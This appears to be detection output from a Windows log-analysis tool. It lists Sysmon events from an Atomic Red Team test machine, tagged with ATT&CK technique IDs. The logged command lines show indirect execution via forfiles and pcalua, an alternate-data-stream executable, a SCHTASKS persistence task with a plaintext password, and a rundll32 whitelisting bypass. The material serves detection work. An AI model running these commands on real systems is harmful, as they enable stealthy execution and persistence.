443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4110 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:07.987 + 747F3D96-DD8B-5D31-0000-001094584A00 + 5792 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4110 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:07.987 + 747F3D96-DD8B-5D31-0000-001094584A00 + 5792 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4108 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:59.829 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4108 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:59.829 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4107 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:43.301 + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4B8-5D31-0000-0010A8CE0600 + 4416 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4105 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:57:52.847 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49734 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4104 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.181 + 747F3D96-DA73-5D31-0000-001061933F00 + 1724 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4103 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.056 + 747F3D96-DA73-5D31-0000-0010918F3F00 + 4092 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-DA73-5D31-0000-00106A8D3F00 + 1052 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4102 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.024 + 747F3D96-DA73-5D31-0000-00106A8D3F00 + 1052 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4100 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:54.123 + 747F3D96-DA72-5D31-0000-001056513F00 + 3680 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-DA72-5D31-0000-0010044F3F00 + 1300 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4099 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:54.080 + 747F3D96-DA72-5D31-0000-0010044F3F00 + 1300 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4098 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:53.815 + 747F3D96-DA71-5D31-0000-00101A463F00 + 6168 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4097 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:52.816 + 747F3D96-DA70-5D31-0000-00100E2C3F00 + 112 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a C:\Windows\system32\javacpl.cpl + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA70-5D31-0000-001007293F00 + 608 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4096 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:52.784 + 747F3D96-DA70-5D31-0000-001007293F00 + 608 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4095 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:50.232 + 747F3D96-DA6E-5D31-0000-001081F93E00 + 1284 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a Java + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA6E-5D31-0000-0010D8F63E00 + 3316 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4094 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:50.198 + 747F3D96-DA6E-5D31-0000-0010D8F63E00 + 3316 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4093 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:47.232 + 747F3D96-DA6B-5D31-0000-00102DD33E00 + 5348 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a -c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA6B-5D31-0000-0010CCD03E00 + 5332 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4092 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:47.195 + 747F3D96-DA6B-5D31-0000-0010CCD03E00 + 5332 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4091 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.915 + 747F3D96-DA6A-5D31-0000-00104BC83E00 + 888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4090 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-19 14:57:46.845 + 747F3D96-DA6A-5D31-0000-0010C5C43E00 + 3352 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-DA6A-5D31-0000-001074C23E00 + 3872 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4089 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.814 + 747F3D96-DA6A-5D31-0000-001074C23E00 + 3872 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + 